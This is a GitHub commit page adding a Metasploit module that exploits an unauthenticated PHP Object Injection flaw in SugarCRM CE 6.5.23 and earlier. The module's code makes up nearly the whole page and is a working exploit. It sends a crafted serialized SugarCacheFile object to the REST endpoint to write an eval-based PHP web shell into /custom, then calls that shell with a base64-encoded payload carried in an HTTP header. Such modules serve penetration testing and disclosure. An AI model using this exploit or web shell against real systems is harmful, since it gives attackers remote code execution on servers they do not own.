Skip to content

Commit ed5bbb9

Browse files
committed
Land rapid7#7284, Add SugarCRM REST PHP Object Injection exploit
2 parents 8eb2c92 + a0095ad commit ed5bbb9

File tree

1 file changed

+94
-0
lines changed

1 file changed

+94
-0
lines changed
Lines changed: 94 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,94 @@
1+
##
2+
# This module requires Metasploit: http://metasploit.com/download
3+
# Current source: https://github.com/rapid7/metasploit-framework
4+
##
5+
6+
require 'msf/core'
7+
8+
class MetasploitModule < Msf::Exploit::Remote
9+
Rank = ExcellentRanking
10+
11+
include Msf::Exploit::Remote::HttpClient
12+
include Msf::Exploit::FileDropper
13+
14+
def initialize(info = {})
15+
super(update_info(info,
16+
'Name' => 'SugarCRM REST Unserialize PHP Code Execution',
17+
'Description' => %q{
18+
This module exploits a PHP Object Injection vulnerability in SugarCRM CE <= 6.5.23
19+
which could be abused to allow unauthenticated users to execute arbitrary PHP code with
20+
the permissions of the webserver. The dangerous unserialize() call exists in the
21+
'/service/core/REST/SugarRestSerialize.php' script. The exploit abuses the __destruct()
22+
method from the SugarCacheFile class to write arbitrary PHP code into the /custom directory.
23+
},
24+
'Author' => 'EgiX',
25+
'License' => MSF_LICENSE,
26+
'References' =>
27+
[
28+
['URL', 'http://karmainsecurity.com/KIS-2016-07'],
29+
['URL', 'http://www.sugarcrm.com/security/sugarcrm-sa-2016-001'],
30+
['URL', 'http://www.sugarcrm.com/security/sugarcrm-sa-2016-008'],
31+
['URL', 'https://bugs.php.net/bug.php?id=72663']
32+
],
33+
'Privileged' => false,
34+
'Platform' => ['php'],
35+
'Arch' => ARCH_PHP,
36+
'Targets' => [ ['SugarCRM CE <= 6.5.23', {}] ],
37+
'DefaultTarget' => 0,
38+
'DisclosureDate' => 'Jun 23 2016'
39+
))
40+
41+
register_options(
42+
[
43+
OptString.new('TARGETURI', [ true, "The base path to the web application", "/sugarcrm/"])
44+
], self.class)
45+
end
46+
47+
def exploit
48+
upload_php = '/custom/' + rand_text_alpha(rand(4)+8) + '.php'
49+
50+
payload_serialized = "O:+14:\"SugarCacheFile\":23:{S:17:\"\\00*\\00_cacheFileName\";"
51+
payload_serialized << "s:#{upload_php.length+2}:\"..#{upload_php}\";S:16:\"\\00*\\00"
52+
payload_serialized << "_cacheChanged\";b:1;S:14:\"\\00*\\00_localStore\";a:1:{i:0;s:55"
53+
payload_serialized << ":\"<?php eval(base64_decode($_SERVER['HTTP_PAYLOAD'])); ?>\";}}"
54+
55+
print_status("#{peer} - Exploiting the unserialize() to upload PHP code")
56+
57+
res = send_request_cgi(
58+
{
59+
'uri' => normalize_uri(target_uri.path, 'service/v4/rest.php'),
60+
'method' => 'POST',
61+
'vars_post' => {
62+
'method' => 'login',
63+
'input_type' => 'Serialize',
64+
'rest_data' => payload_serialized
65+
}
66+
})
67+
68+
unless res
69+
print_error('Connection timed out while sending a request to rest.php')
70+
return
71+
end
72+
73+
if res && res.code != 200
74+
print_error("#{peer} - Exploit failed: #{res.code}")
75+
return
76+
end
77+
78+
register_files_for_cleanup(File.basename(upload_php))
79+
80+
print_status("#{peer} - Executing the payload #{upload_php}")
81+
82+
res = send_request_cgi(
83+
{
84+
'method' => 'GET',
85+
'uri' => normalize_uri(target_uri.path, upload_php),
86+
'headers' => { 'payload' => Rex::Text.encode_base64(payload.encoded) }
87+
})
88+
89+
if res && res.code != 200
90+
print_error("#{peer} - Payload execution failed: #{res.code}")
91+
return
92+
end
93+
end
94+
end

0 commit comments

Comments
 (0)